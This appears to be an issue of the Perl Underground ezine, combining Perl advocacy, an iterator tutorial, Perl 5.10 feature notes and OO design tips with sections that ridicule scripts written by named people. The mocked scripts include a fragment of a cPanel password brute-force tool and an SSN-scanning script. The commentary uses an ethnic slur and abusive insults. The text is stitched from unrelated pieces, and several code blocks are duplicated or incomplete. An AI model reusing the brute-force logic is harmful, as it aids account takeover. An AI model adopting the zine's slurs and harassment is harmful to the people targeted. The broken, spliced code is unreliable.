modules - many are just random pieces of Python that currently complete some
task. Some are good, but the general level of quality is much lower than the
Perl source on CPAN. And they lack the amount or the time of review that
happens with Perl modules. This isn't a knock on Python - you'd be hard
pressed to find another language that does better in these areas. Perl is
just way ahead of the field when it comes to libraries and community.
Why does this matter? Because if you use almost any language, you end up
in Lone Ranger mode - you have a base set of tools that you can trust, but
otherwise you are on your own. C is an obvious example, where you have a
slim standard library for small tasks, and you can probably find some code
online that does something like what you want to do. Coding in Python is
like this, just to a lesser degree. You might find what you want on Pypi,
if you're not doing something too original, but it could be shady, badly
designed, unreliable, and very poorly investigated.
Perl is portable. Your Perl code is very likely to work on any box that
has Perl installed, and has the modules you need. Perl (the program) will
compile on a massive list of operating systems. You can find pre-compiled
binaries for a similar list, see http://www.cpan.org/ports/. Most Perl code
will not need modifications to work on other operating systems, let alone
modifications just to "compile" it (like you would with much C).
The language itself is very powerful. You can chain references as deep as
you want to create any kind of data structure you would like. You can
generate and pass anonymous subroutines. Perl has better regular
expressions than anywhere else, and have continued to lap the field with
Perl 5.10 improvements. Modules are easy to create and inherit from. The
language is incredibly flexible to use, and everything is easy. And on and
on and on.
Perl makes it much easier to write correct and secure code than most
languages. On top of simply being a well-developed, mature, interpreted
language, Perl provides strict, warnings, and taint mode to assist you.
Coding in Perl goes long past just trying to make it work - that's often
incredibly easy. Perl coding becomes about just how to make it work, to be
clean, resource friendly, and maintainable. Combined with the extensive
code archive and well-established practices, Perl is a very high-level
language.
Perl is popular. It doesn't have the popularity of C*, .NET, or Java, but
it also doesn't have massive corporate backing nor is it taught
extensively by colleges. Perl is the king of interpreted languages, and if
you are a good coder who codes good Perl, there is a job out there for you.
So if you are tired of dealing with the bugs of your language, or you're
tired of spending a majority of your coding effort on menial tasks, try
Perl. Look at other languages too - Python, Ruby, C, Java, these are all
fine languages with positive sides, and they might be right for your
project. But don't hold an old, outdated, prejudice against Perl. Remember
that while other languages have developed quickly, they are still playing
catch-up, while the last few years of work on Perl can be seen as invested
in Perl 5.10 and Perl 6, both of which are big improvements from whatever
Perl you remember.
-[0x12] # Some wit about iterators ---------------------------------------
But they don't have to be. You can often write iterators that look like
their recursive counterparts — they even include recursive calls — but
they don't suffer from explosive growth. That is, they'll still take a
long time to get through a billion combinations, but they'll start
returning them to you right away, and they won't eat up all your memory.
sub iter_choose_n {
my $n = pop;
# Base cases
my $once = 0;
return sub {$once++ ? () : []} if $n == 0 or $n > @_;
my ($first, @rest) = @_;
return sub {$once++ ? () : [$first, @rest]} if $n == @_;
Apart from the iterator trappings, we've got essentially what we had
before. Converting the map into an iterator involves some similar work,
but the parallels are still pretty obvious. We exhaust the first iterator
before turning to the second:
# otherwise..
my $include_iter = iter_choose_n(@rest, $n-1);
my $exclude_iter = iter_choose_n(@rest, $n);
return sub {
if (my $set = $include_iter->()) {
return [$first, @$set];
}
else {
return $exclude_iter->();
}
}
# otherwise..
my $include_iter = iter_choose_n(@rest, $n-1);
my $exclude_iter;
return sub {
if (my $set = $include_iter->()) {
return [$first, @$set];
}
else {
$exclude_iter ||= iter_choose_n(@rest, $n);
return $exclude_iter->();
}
}
}
Now our code is singly recursive, O(N) in space and time to generate an
iterator, and that makes a big difference. Big enough that you probably
won't need to go to the trouble of coming up with an O(1) truly iterative
solution.
# otherwise..
my $include_iter = iter_choose_n(@rest, $n-1);
my $exclude_iter;
return sub {
if ($include_iter and my $set = $include_iter->()) {
return [$first, @$set];
}
else {
if ($include_iter) {
undef $include_iter;
$exclude_iter = iter_choose_n(@rest, $n);
}
return $exclude_iter->();
}
}
}
-[0x13] # Some gumhead named Gumbie --------------------------------------
=pod
From: superheroes@hushmail.com
Not all of our spoils from our hacks make it into our zine. Some of them are
left out simply because they are dull; others are left out due to space
constraints and still others are omitted because we cannot think of a good
way to present them, or we know someone who can do it better.
This is one such case. During our romp through the HellBound Hackers' IRC
network, we came across this Perl script that one of the IRC opers/server
admins there (specifically Gumbie) had written in an attempt to catch
people running privileged processes on his servers.
The code quality was terrible, and provided us for a good laugh. There were
also various design issues. Come on, a monitoring program that does no
integrity checking of its logs or itself? Not to mention that the whole
concept of the program screams "1992".
In any event, we decided to email this to you, and let the real experts
of the field handle this one. Hope it amuses you as well as your readers.
--ZF0
=cut
# Sure thing.
# For future reference, we encourage material contributions (and rarely
# turn them down, even if the target is some random loser we've never
# heard of.
# Did you do all this tabbing yourselves or did it come like this?
#!/usr/bin/perl
#print @list
foreach $p (@list) { # You really like foreach(), don't you?
# print "--------------------------------\n";
# print "pid: ", $p->{pid}, " uid: ", $p->{uid}, " euid: ",
$p->{euid}, " ppid: ";
# print $p->{ppid}, " ", $p->{cmndline}, "\n";
# No exit?
# Wow that was shitty. All those pointless loops and random variables. It
# was a nightmare to follow.
# Please, gumbie, do the world a favor and never code anything ever again.
Here are some things of the top of my head that I think are pretty cool:
state variables
No more scoping variables with an outer curly block, or the
naughty my $f if 0 trick (the latter is now a syntax error).
defined-or
No more $x = defined $y ? $y : $z, you may write $x = $y // $z
instead.
regexp improvements
Lots of work done by dave_the_m to clean up the internals, which
paved the way for demerphq to add all sorts of new cool stuff.
smaller variable footprints
Nicholas Clark worked on the implementations of SVs, AVs, HVs and
other data structures to reduce their size to a point that happens
to hit a sweet spot on 32-bit architectures
smaller constant sub footprints
Nicholas Clark reduced the size of constant subs (like use
constant FOO => 2). The result when loading a module like POSIX is
significant.
stacked filetests
you can now say if (-e -f -x $file). Perl 6 was supposed to allow
this, but they moved in a different direction. Oh well.
lexical $_
allows you to nest $_ (without using local).
_ prototype
you can now declare a sub with prototype _. If called with no
arguments, gets fed with $_ (allows you to replace builtins more
cleanly).
x operator on a list
you can now say my @arr = qw(x y z) x 4. (Update: this feature was
backported to the 5.8 codebase after having been implemented in blead,
which is how Somni notices that it is available in 5.8.8).
switch
a true switch/given construct, inspired by Perl 6
smart match operator (~~)
to go with the switch
closure improvements
dave_the_m thoroughly revamped the closure handling code to fix a
number of buggy behaviours and memory leaks.
faster Unicode
lc, uc and /i are faster on Unicode strings. Improvements to the
UTF-8 cache.
improved sorts
inplace sorts performed when possible, rather than using a
temporary. Sort functions can be called recursively: you can sort a
tree
map in void context
is no longer evil. Only morally.
less opcodes
used in the creation of anonymous lists and hashes. Faster pussycat!
tainting improvements
More things that could be tainted are marked as such (such as
sprintf formats)
$# and $* removed
Less action at a distance
perlcc and JPL removed
These things were just bug magnets, and no-one cared enough about
them.
update: ok, in some ways that's just a rehash of perldelta, here's the
executive summary:
There has been an awful lot of refactoring done under the hood. Andy
"petdance" Lester added const to just about everything that it was
possible to do, and in the process uncovered lots of questionable
practices in the code. Similarly, Nicholas Clark and Dave Mitchell nailed
down many, many, many memory leaks.
Much of the work done to the internals results in a much more robust
engine. Far likelier err, less likely, to leak, or, heavens forbid, dump
core. If you have long running processes that chew through datasets and/or
use closures heavily, that is a good reason to upgrade.
For new developments, there are a number of additions at the syntax level
that make writing Perlish code even better. Things like Mark-Jason
Dominus's book on Higher Order Perl makes heavy use of constructs such as
closures that tend to leak in 5.8. If this style of programming becomes
more widespread (and I hope it does, because it allows one to leverage the
power of the language in extraordinary ways) then 5.10 will be a better
fit.
Years ago, having been bitten by nasty things in 5.6, I asked Does 5.8.0
suck?. As it turns out, it didn't. I think that 5.10 won't suck, either.
One big thing that has changed then is that far more people are smoking
all sorts of weird combinations of build configurations on a number of
different platforms, and many corrections are being made as a result of
that. Things that otherwise would have forced a 5.10.1 to be pushed out in
short order.
People need to go back to the basics. Read some documentation. I'll even
provide links to the cute online perldoc.
Syntax - http://perldoc.perl.org/perlsyn.html
Data types - http://perldoc.perl.org/perldata.html
Subroutines - http://perldoc.perl.org/perlsub.html
Operators - http://perldoc.perl.org/perlop.html
Functions - http://perldoc.perl.org/perlfunc.html
Regex - http://perldoc.perl.org/perlre.html
References - http://perldoc.perl.org/perlref.html
Structures - http://perldoc.perl.org/perldsc.html
-[0x16] # Hessam-x needs schooling (and not just for English) ------------
Perl Underground talk about exploiters perl codes. in this ezine they
focused on bad perl codes. this is really nice .
Read this ezine on milw0rm.com
# The above quote comes from Hessam-x' website from quite a while back.
# It's good that he likes our zine, we like that, but all the more reason
# to make sure he improves his Perl!
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
headx();
sub headx() {
print q(
###############################################################
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);
# Lame open format, and lame that you just read and then process.
# while ( <$passfile> ) { # etc
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P; # uh...
$passwd = $P; # uh...
print "\n [~] Try Password : $passwd \n";
&brut;
};
}
sub brut() {
# How about you learn how to send parameters to functions, retard
$authx = encode_base64($user.":".$passwd);
print $authx;
if ($answer =~ /Moved/) {
print "\n [~] PASSWORD FOUND : $passwd \n";
exit();
}
}
# Was there a single line in that whole script that didn't suck like a horny
# paki? Short and shitty. We went extra easy because you're a fan :-D
NAME
SYNOPSIS
The following is not about how to write OO code in Perl. There's plenty of
nodes covering that topic. Instead, this is a general list of tips that I
like to keep in mind when I'm writing OO code. It's not exhaustive, but it
does cover a number of areas that I see many people (including myself),
get wrong or overlook.
PROBLEMS
Useless OO
sub new {
my ($class,%data) = @_;
return bless \%data, $class;
}
use Acme::Playmate;
Object Heirarchy
Don't subclass simply to alter data
Subclass when you need a more specific instance of a class, not just to
change data. If you do that, you simply want an instance of the object,
not a new class. Subclass to alter or add behavior. While I don't see this
problem a lot, I see it enough that it merits discussion.
package Some::User;
sub new {
bless {}, shift;
}
sub user { die "user() must be implemented in subclass" }
sub pass { die "pass() must be implemented in subclass" }
sub url { die "url() must be implemented in subclass" }
package Some::User::Foo;
sub user { 'bob' }
sub pass { 'seKret' }
sub url { '<a href="http://somesite.com/">http://somesite.com/</a>' }
my $foo = Some::User->new('Foo');
Thus, if you need to change how things work internally, you're doing that
on only one class rather than hunting through a bunch of useless
subclasses.
Law of Demeter
The Law of Demeter simply states that you should only talk to your
immediate friends -- using a chain of method calls to navigate an object
heirarchy is begging for trouble. For example, if an office object has a
manager object, an instance of that manager might have a name.
print $office->manager->name;
That seems all fine and dandy. Now, imagine that you have that in 20
places in your code, but in the manager class, someone changes name to
full_name. Because the code using the office object was forced to walk
through the object heirarchy to get at the data it actually needs, you've
created fragile code. Now the manager class must support a name method to
be backwards compatible (and we get to start on our big ball of mud), or
every reference to it must be changed -- but we've created far too many.
Now, instead of hunting down all of the places where this was accessed,
we've limited this call to one spot and made maintenance much easier. This
can, however, lead to code bloat. Make sure you understand the tradeoffs
involved.
Liskov substitution principle
While there is disagreement over what this means, this principle states
(paraphrasing) that a subclass must present the same interface as its
superclass. Some argue that the behavior or subclasses (or subtypes)
should not change, though I feel that with proper encapsulation, this
distinction goes away. For example, imagine a cash register program where
a person's order is paid via a combination of credit card, check, and cash
(such as when three people annoy the waiter by splitting the bill).
Methods
$object->{foo};
All of these issues and more crop up when you let people reach into the
object. One of the major points of OO programming is to allow proper
encapsulation of what's going on inside of the object. As soon as you let
your defensive programming guard down, you're going to get bug reports.
Use proper methods to handle this:
$object->foo;
$object->set_foo($foo);
if ($object->error) {
$object->log_errors
} # bad!
Whoops! Now we have a problem. Not only does every place in the code that
might want to log errors have to first check if those errors exist, your
log_errors method might erroneously assume that this has been checked.
Check the state inside of the method.
sub log_errors {
my $self = shift;
return $self unless $self->error;
$self->_log_errors;
}
Better yet, there's a good chance that you're not concerned about the
error log at runtime, so you could simply specify an error log in your
constructor (or have the class use a default log), and let the module
handle all of that internally.
sub connect {
my $self = shift;
unless ($self->_get_rss_feed) {
$self->_log_errors;
$self->_fetch_cached_copy;
}
$self;
}
In the above example, there's an error that should be noted, but since a
cached copy of data is acceptable, there's no need for the program to deal
with this directly. The object notes the problem internally, adopts a
fallback remedy and everything is peachy.
Keep your data structures uniform
(I saw this on use.perl but I can't remember who posted it)
$object->set_foo( $object->get_foo );
Failure to do this will cause no end of grief for programmers who assume
that that the object accepts the data structures that it emits.
Debugging
$object->as_string
That's easier to read and, by doing lookups on the category and bin ids,
you can present output that's easier to understand.
Test
I've saved the best for last for a good reason. Write a full set of tests!
One of the nicest things about tests is that you can ask someone to run
them if they submit a bug report. Failing that, it's a perfect way to
ensure that a bug does not return, that your objects behave as documented
and that you don't have ``extra features'' that you weren't expecting.
sub new {
my ($class, %data) = @_;
bless \%data => $class;
}
Yet another fascinating thing about tests is the freedom they give you. If
you have a comprehensive test suite, you can start taking liberties with
your code in a way that you haven't before. Are you having performance
problems because you're using an accessor in the bottom of a nested loop?
If the object is a blessed hashref, you might get quite a performance
boost by just ``reaching inside'' and grabbing the data you need directly.
While many will tell you this is a no-no, the reason they mention this is
for maintainability. However, a good test suite will protect you against
many of the maintainability problems you may face (though it still won't
make fixing your encapsulation violations any easier once you are bitten).
That last paragraph might sound a bit curious. Is Ovid really telling
people it's OK to violate encapsulation, particularly after he pointed out
the evils of it?
Yes, I am saying that. I'm not recommending that, but one thing that often
gets lost in the shuffle when ``paradigm'' flame wars begin is that
programming is a series of compromises. Rare indeed is the programmer who
has claimed that she's never compromised the integrity of her code for
performance, cost, or deadline pressures. We want to have a perfect system
that people will ``ooh'' and ``aah'' over, but when you see the boss
coming down the hall with a worried look, you realize that the latest
nasty hack is going to make its way into production. Tests, therefore, are
your friend. Tests will tell you if the nasty little hack works. Tests
will tell you when the nasty little hack breaks.
CONCLUSION
Update: I really should have called this "Often Overlooked Object Oriented
Observations". Then we could refer to this node as "'O'x5".
Cheers,
Ovid
#!/usr/bin/perl
use strict;
use File::Find;
# You know that all your little formatting stuff is lame, right?
# Why not just use the localtime as it's returned?
# At least you did localtime(time) though. That's something.
# Our guess is that you meant while (<FILE>) but just were too fucking lame to
notice
# that you lost at the internet. And yes, we did "view source" to be sure ;[
while () {
# Search documents for SSN's
if (/([0-9]{3}-[0-9]{2}-[0-9]{4})/) { # Ah, the implicitness...
$found = $1;
next;
}
}
print LOG "FOUND: $foundFile\n" if $found; # At least you know one-line if()'s
}
print "\nSearch completed. Wrote to file: $logdir$logname"; # No "\n" or / ?
# TS/SCI security is a good example of some jerkoffs who want to put themselves
somewhere in the blog
# scene but don't have any content to back them up. So they say "let's put up four
or five really
# shitty scripts, in different languages, to show those blog-reading bitches that
we've got skillz,
# but we're going to be too lame to actually get it right or notice the mistakes,
and nobody will read
# our shit anyways so it's all good"
# Good thing we have talented people to poke fun at, otherwise we'd rip apart every
fucking piece of
# code you penisgrabbers had up there.
That's all, folks. Thanks for coming out. Thanks to the people who helped out, and
to everyone who waited patiently. Shouts to everyone using Perl 5.10 already.
___ _ _ _ _ ___ _
| _ | | | | | | | | | | | |
| _|_ ___| | | | |___ _| |___ ___| _|___ ___ _ _ ___ _| |
| | -_| _| | | | | | . | -_| _| | | _| . | | | | . |
|_|___|_| |_| |___|_|_|___|___|_| |___|_| |___|___|_|_|___|
Forever Abigail